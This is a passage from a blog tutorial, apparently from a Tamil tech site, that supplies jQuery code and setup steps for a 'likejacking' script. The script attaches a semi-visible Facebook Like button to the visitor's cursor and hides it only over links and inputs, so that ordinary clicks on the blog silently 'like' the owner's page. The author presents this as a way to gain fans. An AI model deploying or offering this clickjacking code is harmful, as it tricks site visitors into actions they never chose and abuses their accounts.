clickjack_hider(){jQuery(&quot;input&quot;).mouseout(function(){ClickJackFbShow();});jQuery(&quot;a&quot;).mouseout(function(){ClickJackFbShow();});jQuery(&quot;button&quot;).mouseout(function(){ClickJackFbShow();});jQuery(&quot;textarea&quot;).mouseout(function(){ClickJackFbShow();});jQuery(&quot;.ratingblock&quot;).mouseout(function(){ClickJackFbShow();});jQuery(&quot;object&quot;).mouseout(function(){ClickJackFbShow();});jQuery(&quot;input&quot;).mouseover(function(){ClickJackFbHide();});jQuery(&quot;a&quot;).mouseover(function(){ClickJackFbHide();});jQuery(&quot;button&quot;).mouseover(function(){ClickJackFbHide();});jQuery(&quot;textarea&quot;).mouseover(function(){ClickJackFbHide();});jQuery(&quot;.ratingblock&quot;).mouseover(function(){ClickJackFbHide();});jQuery(&quot;object&quot;).mouseover(function(){ClickJackFbHide();});}</script>
  3. Now just replace the Blue line in above code with your Facebook page username and if you have already installed that jQuery Script just remove that Red line too and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.

REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :)
------------------------------------------------------------------------------------------------------------------------
எமது தளத்தில் விளம்பரம் செய்ய விரும்புபவர்கள் ( antonavi713@gmail.com ) என்ற Email மூலம் தொடர்பு கொள்ளுங்கள். ( குறைந்த கட்டணத்தில்.)

* நண்பர்களே இப்பதிவு உங்களக்கு பிடித்திருந்தால் உங்களது கருத்துக்களை மறக்காமல் தெரிவிக்கவும். 

>>> Facebook Page பக்கத்தில் Like பண்ணாதவர்கள்  கணினி தொழில்நுட்பம் Pageல் லைக் செய்திடுங்கள்.



>>> Facebook Group  இல் இணையாதவர்கள் கணினி தொழில்நுட்பம் Group இல் இணைந்து கொள்ளுங்கள்.


Read More

பிரபலமான இடுகைகள்